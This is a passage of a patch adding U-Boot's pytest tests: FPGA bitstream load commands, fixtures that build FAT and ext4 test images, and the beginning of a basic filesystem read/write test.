+@pytest.mark.buildconfigspec('legacy_image_format') +def test_fpga_loadmk_legacy_variable(ubman): + f, dev, addr, bit, bit_size = load_file_from_var(ubman, 'mkimage_legacy') + + ubman.run_command('imi %x' % (addr)) + + ubman.run_command('setenv fpga %x' % (dev)) + ubman.run_command('setenv fpgadata %x' % (addr)) + + # this testcase should cover case which looks like it is supported but dev pointer is broken by loading mkimage address + expected_text = 'FPGA loaded successfully' + output = ubman.run_command('fpga loadmk && echo %s' % (expected_text)) + ubman.run_command('setenv fpga') + ubman.run_command('setenv fpgadata') + assert expected_text in output + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_loadmk') +@pytest.mark.buildconfigspec('cmd_echo') +@pytest.mark.buildconfigspec('legacy_image_format') +@pytest.mark.buildconfigspec('gzip') +def test_fpga_loadmk_legacy_gz(ubman): + f, dev, addr, bit, bit_size = load_file_from_var(ubman, 'mkimage_legacy_gz') + + ubman.run_command('imi %x' % (addr)) + + expected_text = 'FPGA loaded successfully' + output = ubman.run_command('fpga loadmk %x %x && echo %s' % (dev, addr, expected_text)) + assert expected_text in output + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_loadmk') +@pytest.mark.buildconfigspec('fit') +@pytest.mark.buildconfigspec('cmd_echo') +def test_fpga_loadmk_fit_external(ubman): + f, dev, addr, bit, bit_size = load_file_from_var(ubman, 'mkimage_fit_external') + + ubman.run_command('imi %x' % (addr)) + + expected_text = 'FPGA loaded successfully' + output = ubman.run_command('fpga loadmk %x %x:fpga && echo %s' % (dev, addr, expected_text)) + assert expected_text in output + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_loadmk') +@pytest.mark.buildconfigspec('fit') +@pytest.mark.buildconfigspec('cmd_echo') +def test_fpga_loadmk_fit(ubman): + f, dev, addr, bit, bit_size = load_file_from_var(ubman, 'mkimage_fit') + + ubman.run_command('imi %x' % (addr)) + + expected_text = 'FPGA loaded successfully' + output = ubman.run_command('fpga loadmk %x %x:fpga && echo %s' % (dev, addr, expected_text)) + assert expected_text in output + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_loadmk') +@pytest.mark.buildconfigspec('fit') +@pytest.mark.buildconfigspec('cmd_echo') +def test_fpga_loadmk_fit_variable_fpga(ubman): + f, dev, addr, bit, bit_size = load_file_from_var(ubman, 'mkimage_fit') + + ubman.run_command('imi %x' % (addr)) + # FIXME this should fail - broken support in past + ubman.run_command('setenv fpga %x' % (dev)) + + expected_text = 'FPGA loaded successfully' + output = ubman.run_command('fpga loadmk %x:fpga && echo %s' % (addr, expected_text)) + ubman.run_command('setenv fpga') + assert expected_text in output + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_loadmk') +@pytest.mark.buildconfigspec('fit') +@pytest.mark.buildconfigspec('cmd_echo') +def test_fpga_loadmk_fit_variable_fpgadata(ubman): + f, dev, addr, bit, bit_size = load_file_from_var(ubman, 'mkimage_fit') + + ubman.run_command('imi %x' % (addr)) + # FIXME this should fail - broken support in past + ubman.run_command('setenv fpgadata %x:fpga' % (addr)) + + expected_text = 'FPGA loaded successfully' + output = ubman.run_command('fpga loadmk %x && echo %s' % (dev, expected_text)) + ubman.run_command('setenv fpgadata') + assert expected_text in output + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_loadmk') +@pytest.mark.buildconfigspec('fit') +@pytest.mark.buildconfigspec('cmd_echo') +def test_fpga_loadmk_fit_variable(ubman): + f, dev, addr, bit, bit_size = load_file_from_var(ubman, 'mkimage_fit') + + ubman.run_command('imi %x' % (addr)) + + ubman.run_command('setenv fpga %x' % (dev)) + ubman.run_command('setenv fpgadata %x:fpga' % (addr)) + + expected_text = 'FPGA loaded successfully' + output = ubman.run_command('fpga loadmk && echo %s' % (expected_text)) + ubman.run_command('setenv fpga') + ubman.run_command('setenv fpgadata') + assert expected_text in output + +###### FPGA LOAD tests ###### + +@pytest.mark.buildconfigspec('cmd_fpga') +def test_fpga_loadfs_fail(ubman): + dev, f = check_dev(ubman) + + addr = f.get('addr', -1) + if addr < 0: + pytest.fail('No address specified via env__fpga_under_test') + + bit = f['loadfs'] + bit_size = f['loadfs_size'] + block_size = f['loadfs_block_size'] + + # less params - dev number removed + expected = 'fpga: incorrect parameters passed' + output = ubman.run_command('fpga loadfs %x %x %x %s' % (addr, bit_size, block_size, bit)) + #assert expected in output + assert expected_usage in output + + # one more param - 0 at the end + # This is the longest command that's why there is no message from cmd/fpga.c + output = ubman.run_command('fpga loadfs %x %x %x %x %s 0' % (dev, addr, bit_size, block_size, bit)) + assert expected_usage in output + + # zero address 0 + expected = 'fpga: zero fpga_data address' + output = ubman.run_command('fpga loadfs %x %x %x %x %s' % (dev, 0, bit_size, block_size, bit)) + #assert expected in output + assert expected_usage in output + + # bit_size 0 + expected = 'fpga: zero size' + output = ubman.run_command('fpga loadfs %x %x %x %x %s' % (dev, addr, 0, block_size, bit)) + #assert expected in output + assert expected_usage in output + + # block size 0 + # FIXME this should pass but it failing too + output = ubman.run_command('fpga loadfs %x %x %x %x %s' % (dev, addr, bit_size, 0, bit)) + assert expected_usage in output + + # non existing bitstream name + expected = 'Unable to read file noname' + output = ubman.run_command('fpga loadfs %x %x %x %x mmc 0 noname' % (dev, addr, bit_size, block_size)) + assert expected in output + assert expected_usage in output + + # -1 dev number + expected = 'fpga_fsload: Invalid device number -1' + output = ubman.run_command('fpga loadfs %d %x %x %x mmc 0 noname' % (-1, addr, bit_size, block_size)) + assert expected in output + assert expected_usage in output + + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_echo') +def test_fpga_loadfs(ubman): + dev, f = check_dev(ubman) + + addr = f.get('addr', -1) + if addr < 0: + pytest.fail('No address specified via env__fpga_under_test') + + bit = f['loadfs'] + bit_size = f['loadfs_size'] + block_size = f['loadfs_block_size'] + + # This should be done better + expected_text = 'FPGA loaded successfully' + output = ubman.run_command('fpga loadfs %x %x %x %x %s && echo %s' % (dev, addr, bit_size, block_size, bit, expected_text)) + assert expected_text in output + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_load_secure') +@pytest.mark.buildconfigspec('cmd_net') +@pytest.mark.buildconfigspec('cmd_dhcp') +@pytest.mark.buildconfigspec('net') +def test_fpga_secure_bit_auth(ubman): + + test_net.test_net_dhcp(ubman) + test_net.test_net_setup_static(ubman) + + f = ubman.config.env.get('env__fpga_secure_readable_file', None) + if not f: + pytest.skip('No TFTP readable file to read') + + addr = f.get('addr', None) + if not addr: + addr = utils.find_ram_base(ubman) + + expected_tftp = 'Bytes transferred = ' + fn = f['fn'] + output = ubman.run_command('tftpboot %x %s' % (addr, fn)) + assert expected_tftp in output + + expected_zynqmpsecure = 'Bitstream successfully loaded' + output = ubman.run_command('fpga loads 0 %x $filesize 0 2' % (addr)) + assert expected_zynqmpsecure in output + + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_load_secure') +@pytest.mark.buildconfigspec('cmd_net') +@pytest.mark.buildconfigspec('cmd_dhcp') +@pytest.mark.buildconfigspec('net') +def test_fpga_secure_bit_img_auth_kup(ubman): + + test_net.test_net_dhcp(ubman) + test_net.test_net_setup_static(ubman) + + f = ubman.config.env.get('env__fpga_secure_readable_file', None) + if not f: + pytest.skip('No TFTP readable file to read') + + keyaddr = f.get('keyaddr', None) + if not keyaddr: + addr = utils.find_ram_base(ubman) + expected_tftp = 'Bytes transferred = ' + keyfn = f['keyfn'] + output = ubman.run_command('tftpboot %x %s' % (keyaddr, keyfn)) + assert expected_tftp in output + + addr = f.get('addr', None) + if not addr: + addr = utils.find_ram_base(ubman) + expected_tftp = 'Bytes transferred = ' + fn = f['enckupfn'] + output = ubman.run_command('tftpboot %x %s' % (addr, fn)) + assert expected_tftp in output + + expected_zynqmpsecure = 'Bitstream successfully loaded' + output = ubman.run_command('fpga loads 0 %x $filesize 0 1 %x' % (addr, keyaddr)) + assert expected_zynqmpsecure in output diff --git a/test/py/tests/test_fs/conftest.py b/test/py/tests/test_fs/conftest.py new file mode 100644 index 00000000000..47a584ffe7c --- /dev/null +++ b/test/py/tests/test_fs/conftest.py @@ -0,0 +1,689 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2018, Linaro Limited +# Author: Takahiro Akashi <takahiro.akashi@linaro.org> + +import os +import os.path +import pytest +import re +from subprocess import call, check_call, check_output, CalledProcessError +from fstest_defs import * +# pylint: disable=E0611 +from tests import fs_helper + +supported_fs_basic = ['fat16', 'fat32', 'ext4'] +supported_fs_ext = ['fat12', 'fat16', 'fat32'] +supported_fs_fat = ['fat12', 'fat16'] +supported_fs_mkdir = ['fat12', 'fat16', 'fat32'] +supported_fs_unlink = ['fat12', 'fat16', 'fat32'] +supported_fs_symlink = ['ext4'] +supported_fs_rename = ['fat12', 'fat16', 'fat32'] + +# +# Filesystem test specific setup +# +def pytest_addoption(parser): + """Enable --fs-type option. + + See pytest_configure() about how it works. + + Args: + parser: Pytest command-line parser. + + Returns: + Nothing. + """ + parser.addoption('--fs-type', action='append', default=None, + help='Targeting Filesystem Types') + +def pytest_configure(config): + """Restrict a file system(s) to be tested. + + A file system explicitly named with --fs-type option is selected + if it belongs to a default supported_fs_xxx list. + Multiple options can be specified. + + Args: + config: Pytest configuration. + + Returns: + Nothing. + """ + global supported_fs_basic + global supported_fs_ext + global supported_fs_fat + global supported_fs_mkdir + global supported_fs_unlink + global supported_fs_symlink + global supported_fs_rename + + def intersect(listA, listB): + return [x for x in listA if x in listB] + + supported_fs = config.getoption('fs_type') + if supported_fs: + print('*** FS TYPE modified: %s' % supported_fs) + supported_fs_basic = intersect(supported_fs, supported_fs_basic) + supported_fs_ext = intersect(supported_fs, supported_fs_ext) + supported_fs_fat = intersect(supported_fs, supported_fs_fat) + supported_fs_mkdir = intersect(supported_fs, supported_fs_mkdir) + supported_fs_unlink = intersect(supported_fs, supported_fs_unlink) + supported_fs_symlink = intersect(supported_fs, supported_fs_symlink) + supported_fs_rename = intersect(supported_fs, supported_fs_rename) + +def pytest_generate_tests(metafunc): + """Parametrize fixtures, fs_obj_xxx + + Each fixture will be parametrized with a corresponding support_fs_xxx + list. + + Args: + metafunc: Pytest test function. + + Returns: + Nothing. + """ + if 'fs_obj_basic' in metafunc.fixturenames: + metafunc.parametrize('fs_obj_basic', supported_fs_basic, + indirect=True, scope='module') + if 'fs_obj_ext' in metafunc.fixturenames: + metafunc.parametrize('fs_obj_ext', supported_fs_ext, + indirect=True, scope='module') + if 'fs_obj_fat' in metafunc.fixturenames: + metafunc.parametrize('fs_obj_fat', supported_fs_fat, + indirect=True, scope='module') + if 'fs_obj_mkdir' in metafunc.fixturenames: + metafunc.parametrize('fs_obj_mkdir', supported_fs_mkdir, + indirect=True, scope='module') + if 'fs_obj_unlink' in metafunc.fixturenames: + metafunc.parametrize('fs_obj_unlink', supported_fs_unlink, + indirect=True, scope='module') + if 'fs_obj_symlink' in metafunc.fixturenames: + metafunc.parametrize('fs_obj_symlink', supported_fs_symlink, + indirect=True, scope='module') + if 'fs_obj_rename' in metafunc.fixturenames: + metafunc.parametrize('fs_obj_rename', supported_fs_rename, + indirect=True, scope='module') + +# +# Helper functions +# +def fstype_to_ubname(fs_type): + """Convert a file system type to an U-Boot specific string + + A generated string can be used as part of file system related commands + or a config name in u-boot. Currently fat16 and fat32 are handled + specifically. + + Args: + fs_type: File system type. + + Return: + A corresponding string for file system type. + """ + if re.match('fat', fs_type): + return 'fat' + else: + return fs_type + +def check_ubconfig(config, fs_type): + """Check whether a file system is enabled in u-boot configuration. + + This function is assumed to be called in a fixture function so that + the whole test cases will be skipped if a given file system is not + enabled. + + Args: + fs_type: File system type. + + Return: + Nothing. + """ + if not config.buildconfig.get('config_cmd_%s' % fs_type, None): + pytest.skip('.config feature "CMD_%s" not enabled' % fs_type.upper()) + if not config.buildconfig.get('config_%s_write' % fs_type, None): + pytest.skip('.config feature "%s_WRITE" not enabled' + % fs_type.upper()) + +# from test/py/conftest.py +def tool_is_in_path(tool): + """Check whether a given command is available on host. + + Args: + tool: Command name. + + Return: + True if available, False if not. + """ + for path in os.environ['PATH'].split(os.pathsep): + fn = os.path.join(path, tool) + if os.path.isfile(fn) and os.access(fn, os.X_OK): + return True + return False + +# +# Fixture for basic fs test +# derived from test/fs/fs-test.sh +# +@pytest.fixture() +def fs_obj_basic(request, u_boot_config): + """Set up a file system to be used in basic fs test. + + Args: + request: Pytest request object. + u_boot_config: U-Boot configuration. + + Return: + A fixture for basic fs test, i.e. a triplet of file system type, + volume file name and a list of MD5 hashes. + """ + fs_type = request.param + fs_img = '' + + fs_ubtype = fstype_to_ubname(fs_type) + check_ubconfig(u_boot_config, fs_ubtype) + + scratch_dir = u_boot_config.persistent_data_dir + '/scratch' + + small_file = scratch_dir + '/' + SMALL_FILE + big_file = scratch_dir + '/' + BIG_FILE + + try: + check_call('mkdir -p %s' % scratch_dir, shell=True) + except CalledProcessError as err: + pytest.skip('Preparing mount folder failed for filesystem: ' + fs_type + '. {}'.format(err)) + call('rm -f %s' % fs_img, shell=True) + return + + try: + # Create a subdirectory. + check_call('mkdir %s/SUBDIR' % scratch_dir, shell=True) + + # Create big file in this image. + # Note that we work only on the start 1MB, couple MBs in the 2GB range + # and the last 1 MB of the huge 2.5GB file. + # So, just put random values only in those areas. + check_call('dd if=/dev/urandom of=%s bs=1M count=1' + % big_file, shell=True) + check_call('dd if=/dev/urandom of=%s bs=1M count=2 seek=2047' + % big_file, shell=True) + check_call('dd if=/dev/urandom of=%s bs=1M count=1 seek=2499' + % big_file, shell=True) + + # Create a small file in this image. + check_call('dd if=/dev/urandom of=%s bs=1M count=1' + % small_file, shell=True) + + # Delete the small file copies which possibly are written as part of a + # previous test. + # check_call('rm -f "%s.w"' % MB1, shell=True) + # check_call('rm -f "%s.w2"' % MB1, shell=True) + + # Generate the md5sums of reads that we will test against small file + out = check_output( + 'dd if=%s bs=1M skip=0 count=1 2> /dev/null | md5sum' + % small_file, shell=True).decode() + md5val = [ out.split()[0] ] + + # Generate the md5sums of reads that we will test against big file + # One from beginning of file. + out = check_output( + 'dd if=%s bs=1M skip=0 count=1 2> /dev/null | md5sum' + % big_file, shell=True).decode() + md5val.append(out.split()[0]) + + # One from end of file. + out = check_output( + 'dd if=%s bs=1M skip=2499 count=1 2> /dev/null | md5sum' + % big_file, shell=True).decode() + md5val.append(out.split()[0]) + + # One from the last 1MB chunk of 2GB + out = check_output( + 'dd if=%s bs=1M skip=2047 count=1 2> /dev/null | md5sum' + % big_file, shell=True).decode() + md5val.append(out.split()[0]) + + # One from the start 1MB chunk from 2GB + out = check_output( + 'dd if=%s bs=1M skip=2048 count=1 2> /dev/null | md5sum' + % big_file, shell=True).decode() + md5val.append(out.split()[0]) + + # One 1MB chunk crossing the 2GB boundary + out = check_output( + 'dd if=%s bs=512K skip=4095 count=2 2> /dev/null | md5sum' + % big_file, shell=True).decode() + md5val.append(out.split()[0]) + + try: + # 3GiB volume + fs_img = fs_helper.mk_fs(u_boot_config, fs_type, 0xc0000000, '3GB', scratch_dir) + except CalledProcessError as err: + pytest.skip('Creating failed for filesystem: ' + fs_type + '. {}'.format(err)) + return + + except CalledProcessError as err: + pytest.skip('Setup failed for filesystem: ' + fs_type + '. {}'.format(err)) + return + else: + yield [fs_ubtype, fs_img, md5val] + finally: + call('rm -rf %s' % scratch_dir, shell=True) + call('rm -f %s' % fs_img, shell=True) + +# +# Fixture for extended fs test +# +@pytest.fixture() +def fs_obj_ext(request, u_boot_config): + """Set up a file system to be used in extended fs test. + + Args: + request: Pytest request object. + u_boot_config: U-Boot configuration. + + Return: + A fixture for extended fs test, i.e. a triplet of file system type, + volume file name and a list of MD5 hashes. + """ + fs_type = request.param + fs_img = '' + + fs_ubtype = fstype_to_ubname(fs_type) + check_ubconfig(u_boot_config, fs_ubtype) + + scratch_dir = u_boot_config.persistent_data_dir + '/scratch' + + min_file = scratch_dir + '/' + MIN_FILE + tmp_file = scratch_dir + '/tmpfile' + + try: + check_call('mkdir -p %s' % scratch_dir, shell=True) + except CalledProcessError as err: + pytest.skip('Preparing mount folder failed for filesystem: ' + fs_type + '. {}'.format(err)) + call('rm -f %s' % fs_img, shell=True) + return + + try: + # Create a test directory + check_call('mkdir %s/dir1' % scratch_dir, shell=True) + + # Create a small file and calculate md5 + check_call('dd if=/dev/urandom of=%s bs=1K count=20' + % min_file, shell=True) + out = check_output( + 'dd if=%s bs=1K 2> /dev/null | md5sum' + % min_file, shell=True).decode() + md5val = [ out.split()[0] ] + + # Calculate md5sum of Test Case 4 + check_call('dd if=%s of=%s bs=1K count=20' + % (min_file, tmp_file), shell=True) + check_call('dd if=%s of=%s bs=1K seek=5 count=20' + % (min_file, tmp_file), shell=True) + out = check_output('dd if=%s bs=1K 2> /dev/null | md5sum' + % tmp_file, shell=True).decode() + md5val.append(out.split()[0]) + + # Calculate md5sum of Test Case 5 + check_call('dd if=%s of=%s bs=1K count=20' + % (min_file, tmp_file), shell=True) + check_call('dd if=%s of=%s bs=1K seek=5 count=5' + % (min_file, tmp_file), shell=True) + out = check_output('dd if=%s bs=1K 2> /dev/null | md5sum' + % tmp_file, shell=True).decode() + md5val.append(out.split()[0]) + + # Calculate md5sum of Test Case 7 + check_call('dd if=%s of=%s bs=1K count=20' + % (min_file, tmp_file), shell=True) + check_call('dd if=%s of=%s bs=1K seek=20 count=20' + % (min_file, tmp_file), shell=True) + out = check_output('dd if=%s bs=1K 2> /dev/null | md5sum' + % tmp_file, shell=True).decode() + md5val.append(out.split()[0]) + + check_call('rm %s' % tmp_file, shell=True) + + try: + # 128MiB volume + fs_img = fs_helper.mk_fs(u_boot_config, fs_type, 0x8000000, '128MB', scratch_dir) + except CalledProcessError as err: + pytest.skip('Creating failed for filesystem: ' + fs_type + '. {}'.format(err)) + return + + except CalledProcessError: + pytest.skip('Setup failed for filesystem: ' + fs_type) + return + else: + yield [fs_ubtype, fs_img, md5val] + finally: + call('rm -rf %s' % scratch_dir, shell=True) + call('rm -f %s' % fs_img, shell=True) + +# +# Fixture for mkdir test +# +@pytest.fixture() +def fs_obj_mkdir(request, u_boot_config): + """Set up a file system to be used in mkdir test. + + Args: + request: Pytest request object. + u_boot_config: U-Boot configuration. + + Return: + A fixture for mkdir test, i.e. a duplet of file system type and + volume file name. + """ + fs_type = request.param + fs_img = '' + + fs_ubtype = fstype_to_ubname(fs_type) + check_ubconfig(u_boot_config, fs_ubtype) + + try: + # 128MiB volume + fs_img = fs_helper.mk_fs(u_boot_config, fs_type, 0x8000000, '128MB', None) + except: + pytest.skip('Setup failed for filesystem: ' + fs_type) + return + else: + yield [fs_ubtype, fs_img] + call('rm -f %s' % fs_img, shell=True) + +# +# Fixture for unlink test +# +@pytest.fixture() +def fs_obj_unlink(request, u_boot_config): + """Set up a file system to be used in unlink test. + + Args: + request: Pytest request object. + u_boot_config: U-Boot configuration. + + Return: + A fixture for unlink test, i.e. a duplet of file system type and + volume file name. + """ + fs_type = request.param + fs_img = '' + + fs_ubtype = fstype_to_ubname(fs_type) + check_ubconfig(u_boot_config, fs_ubtype) + + scratch_dir = u_boot_config.persistent_data_dir + '/scratch' + + try: + check_call('mkdir -p %s' % scratch_dir, shell=True) + except CalledProcessError as err: + pytest.skip('Preparing mount folder failed for filesystem: ' + fs_type + '. {}'.format(err)) + call('rm -f %s' % fs_img, shell=True) + return + + try: + # Test Case 1 & 3 + check_call('mkdir %s/dir1' % scratch_dir, shell=True) + check_call('dd if=/dev/urandom of=%s/dir1/file1 bs=1K count=1' + % scratch_dir, shell=True) + check_call('dd if=/dev/urandom of=%s/dir1/file2 bs=1K count=1' + % scratch_dir, shell=True) + + # Test Case 2 + check_call('mkdir %s/dir2' % scratch_dir, shell=True) + for i in range(0, 20): + check_call('mkdir %s/dir2/0123456789abcdef%02x' + % (scratch_dir, i), shell=True) + + # Test Case 4 + check_call('mkdir %s/dir4' % scratch_dir, shell=True) + + # Test Case 5, 6 & 7 + check_call('mkdir %s/dir5' % scratch_dir, shell=True) + check_call('dd if=/dev/urandom of=%s/dir5/file1 bs=1K count=1' + % scratch_dir, shell=True) + + try: + # 128MiB volume + fs_img = fs_helper.mk_fs(u_boot_config, fs_type, 0x8000000, '128MB', scratch_dir) + except CalledProcessError as err: + pytest.skip('Creating failed for filesystem: ' + fs_type + '. {}'.format(err)) + return + + except CalledProcessError: + pytest.skip('Setup failed for filesystem: ' + fs_type) + return + else: + yield [fs_ubtype, fs_img] + finally: + call('rm -rf %s' % scratch_dir, shell=True) + call('rm -f %s' % fs_img, shell=True) + +# +# Fixture for symlink fs test +# +@pytest.fixture() +def fs_obj_symlink(request, u_boot_config): + """Set up a file system to be used in symlink fs test. + + Args: + request: Pytest request object. + u_boot_config: U-Boot configuration. + + Return: + A fixture for basic fs test, i.e. a triplet of file system type, + volume file name and a list of MD5 hashes. + """ + fs_type = request.param + fs_img = '' + + fs_ubtype = fstype_to_ubname(fs_type) + check_ubconfig(u_boot_config, fs_ubtype) + + scratch_dir = u_boot_config.persistent_data_dir + '/scratch' + + small_file = scratch_dir + '/' + SMALL_FILE + medium_file = scratch_dir + '/' + MEDIUM_FILE + + try: + check_call('mkdir -p %s' % scratch_dir, shell=True) + except CalledProcessError as err: + pytest.skip('Preparing mount folder failed for filesystem: ' + fs_type + '. {}'.format(err)) + call('rm -f %s' % fs_img, shell=True) + return + + try: + # Create a subdirectory. + check_call('mkdir %s/SUBDIR' % scratch_dir, shell=True) + + # Create a small file in this image. + check_call('dd if=/dev/urandom of=%s bs=1M count=1' + % small_file, shell=True) + + # Create a medium file in this image. + check_call('dd if=/dev/urandom of=%s bs=10M count=1' + % medium_file, shell=True) + + # Generate the md5sums of reads that we will test against small file + out = check_output( + 'dd if=%s bs=1M skip=0 count=1 2> /dev/null | md5sum' + % small_file, shell=True).decode() + md5val = [out.split()[0]] + out = check_output( + 'dd if=%s bs=10M skip=0 count=1 2> /dev/null | md5sum' + % medium_file, shell=True).decode() + md5val.extend([out.split()[0]]) + + try: + # 1GiB volume + fs_img = fs_helper.mk_fs(u_boot_config, fs_type, 0x40000000, '1GB', scratch_dir) + except CalledProcessError as err: + pytest.skip('Creating failed for filesystem: ' + fs_type + '. {}'.format(err)) + return + + except CalledProcessError: + pytest.skip('Setup failed for filesystem: ' + fs_type) + return + else: + yield [fs_ubtype, fs_img, md5val] + finally: + call('rm -rf %s' % scratch_dir, shell=True) + call('rm -f %s' % fs_img, shell=True) + +# +# Fixture for rename test +# +@pytest.fixture() +def fs_obj_rename(request, u_boot_config): + """Set up a file system to be used in rename tests. + + Args: + request: Pytest request object. + u_boot_config: U-Boot configuration. + + Return: + A fixture for rename tests, i.e. a triplet of file system type, + volume file name, and dictionary of test identifier and md5val. + """ + def new_rand_file(path): + check_call('dd if=/dev/urandom of=%s bs=1K count=1' % path, shell=True) + + def file_hash(path): + out = check_output( + 'dd if=%s bs=1K skip=0 count=1 2> /dev/null | md5sum' % path, + shell=True + ) + return out.decode().split()[0] + + fs_type = request.param + fs_img = '' + + fs_ubtype = fstype_to_ubname(fs_type) + check_ubconfig(u_boot_config, fs_ubtype) + + mount_dir = u_boot_config.persistent_data_dir + '/scratch' + + try: + check_call('mkdir -p %s' % mount_dir, shell=True) + except CalledProcessError as err: + pytest.skip('Preparing mount folder failed for filesystem: ' + fs_type + '. {}'.format(err)) + call('rm -f %s' % fs_img, shell=True) + return + + try: + md5val = {} + # Test Case 1 + check_call('mkdir %s/test1' % mount_dir, shell=True) + new_rand_file('%s/test1/file1' % mount_dir) + md5val['test1'] = file_hash('%s/test1/file1' % mount_dir) + + # Test Case 2 + check_call('mkdir %s/test2' % mount_dir, shell=True) + new_rand_file('%s/test2/file1' % mount_dir) + new_rand_file('%s/test2/file_exist' % mount_dir) + md5val['test2'] = file_hash('%s/test2/file1' % mount_dir) + + # Test Case 3 + check_call('mkdir -p %s/test3/dir1' % mount_dir, shell=True) + new_rand_file('%s/test3/dir1/file1' % mount_dir) + md5val['test3'] = file_hash('%s/test3/dir1/file1' % mount_dir) + + # Test Case 4 + check_call('mkdir -p %s/test4/dir1' % mount_dir, shell=True) + check_call('mkdir -p %s/test4/dir2/dir1' % mount_dir, shell=True) + new_rand_file('%s/test4/dir1/file1' % mount_dir) + md5val['test4'] = file_hash('%s/test4/dir1/file1' % mount_dir) + + # Test Case 5 + check_call('mkdir -p %s/test5/dir1' % mount_dir, shell=True) + new_rand_file('%s/test5/file2' % mount_dir) + md5val['test5'] = file_hash('%s/test5/file2' % mount_dir) + + # Test Case 6 + check_call('mkdir -p %s/test6/dir2/existing' % mount_dir, shell=True) + new_rand_file('%s/test6/existing' % mount_dir) + md5val['test6'] = file_hash('%s/test6/existing' % mount_dir) + + # Test Case 7 + check_call('mkdir -p %s/test7/dir1' % mount_dir, shell=True) + check_call('mkdir -p %s/test7/dir2/dir1' % mount_dir, shell=True) + new_rand_file('%s/test7/dir2/dir1/file1' % mount_dir) + md5val['test7'] = file_hash('%s/test7/dir2/dir1/file1' % mount_dir) + + # Test Case 8 + check_call('mkdir -p %s/test8/dir1' % mount_dir, shell=True) + new_rand_file('%s/test8/dir1/file1' % mount_dir) + md5val['test8'] = file_hash('%s/test8/dir1/file1' % mount_dir) + + # Test Case 9 + check_call('mkdir -p %s/test9/dir1/nested/inner' % mount_dir, shell=True) + new_rand_file('%s/test9/dir1/nested/inner/file1' % mount_dir) + + # Test Case 10 + check_call('mkdir -p %s/test10' % mount_dir, shell=True) + new_rand_file('%s/test10/file1' % mount_dir) + md5val['test10'] = file_hash('%s/test10/file1' % mount_dir) + + # Test Case 11 + check_call('mkdir -p %s/test11/dir1' % mount_dir, shell=True) + new_rand_file('%s/test11/dir1/file1' % mount_dir) + md5val['test11'] = file_hash('%s/test11/dir1/file1' % mount_dir) + + try: + # 128MiB volume + fs_img = fs_helper.mk_fs(u_boot_config, fs_type, 0x8000000, '128MB', mount_dir) + except CalledProcessError as err: + pytest.skip('Creating failed for filesystem: ' + fs_type + '. {}'.format(err)) + return + + except CalledProcessError: + pytest.skip('Setup failed for filesystem: ' + fs_type) + return + else: + yield [fs_ubtype, fs_img, md5val] + finally: + call('rm -rf %s' % mount_dir, shell=True) + call('rm -f %s' % fs_img, shell=True) + +# +# Fixture for fat test +# +@pytest.fixture() +def fs_obj_fat(request, u_boot_config): + """Set up a file system to be used in fat test. + + Args: + request: Pytest request object. + u_boot_config: U-Boot configuration. + + Return: + A fixture for fat test, i.e. a duplet of file system type and + volume file name. + """ + + # the maximum size of a FAT12 filesystem resulting in 4084 clusters + MAX_FAT12_SIZE = 261695 * 1024 + + # the minimum size of a FAT16 filesystem that can be created with + # mkfs.vfat resulting in 4087 clusters + MIN_FAT16_SIZE = 8208 * 1024 + + fs_type = request.param + fs_img = '' + + fs_ubtype = fstype_to_ubname(fs_type) + check_ubconfig(u_boot_config, fs_ubtype) + + fs_size = MAX_FAT12_SIZE if fs_type == 'fat12' else MIN_FAT16_SIZE + + try: + # the volume size depends on the filesystem + fs_img = fs_helper.mk_fs(u_boot_config, fs_type, fs_size, f'{fs_size}', None, 1024) + except: + pytest.skip('Setup failed for filesystem: ' + fs_type) + return + else: + yield [fs_ubtype, fs_img] + call('rm -f %s' % fs_img, shell=True) diff --git a/test/py/tests/test_fs/fstest_defs.py b/test/py/tests/test_fs/fstest_defs.py new file mode 100644 index 00000000000..35b2bb65183 --- /dev/null +++ b/test/py/tests/test_fs/fstest_defs.py @@ -0,0 +1,16 @@ +# SPDX-License-Identifier: GPL-2.0+ + +# $MIN_FILE is the name of the 20KB file in the file system image +MIN_FILE='testfile' + +# $SMALL_FILE is the name of the 1MB file in the file system image +SMALL_FILE='1MB.file' + +# $MEDIUM_FILE is the name of the 10MB file in the file system image +MEDIUM_FILE='10MB.file' + +# $BIG_FILE is the name of the 2.5GB file in the file system image +BIG_FILE='2.5GB.file' + +ADDR=0x01000008 +LENGTH=0x00100000 diff --git a/test/py/tests/test_fs/fstest_helpers.py b/test/py/tests/test_fs/fstest_helpers.py new file mode 100644 index 00000000000..c1447b4d43e --- /dev/null +++ b/test/py/tests/test_fs/fstest_helpers.py @@ -0,0 +1,15 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2019, Texas Instrument +# Author: JJ Hiblot <jjhiblot@ti.com> +# + +from subprocess import check_call, CalledProcessError + +def assert_fs_integrity(fs_type, fs_img): + try: + if fs_type == 'ext4': + check_call('fsck.ext4 -n -f %s' % fs_img, shell=True) + elif fs_type in ['fat12', 'fat16', 'fat32']: + check_call('fsck.fat -n %s' % fs_img, shell=True) + except CalledProcessError: + raise diff --git a/test/py/tests/test_fs/test_basic.py b/test/py/tests/test_fs/test_basic.py new file mode 100644 index 00000000000..5a02348bb94 --- /dev/null +++ b/test/py/tests/test_fs/test_basic.py @@ -0,0 +1,289 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2018, Linaro Limited +# Author: Takahiro Akashi <takahiro.akashi@linaro.org> +# +# U-Boot File System:Basic Test + +""" +This test verifies basic read/write operation on file system. +""" + +import pytest +import re +from fstest_defs import * +from fstest_helpers import assert_fs_integrity + +@pytest.mark.boardspec('sandbox') +@pytest.mark.slow +class TestFsBasic(object): + def test_fs1(self, ubman, fs_obj_basic): + """ + Test Case 1 - ls command, listing a root directory and invalid directory + """ + fs_type,fs_img,md5val = fs_obj_basic + with ubman.log.section('Test Case 1a - ls'): + # 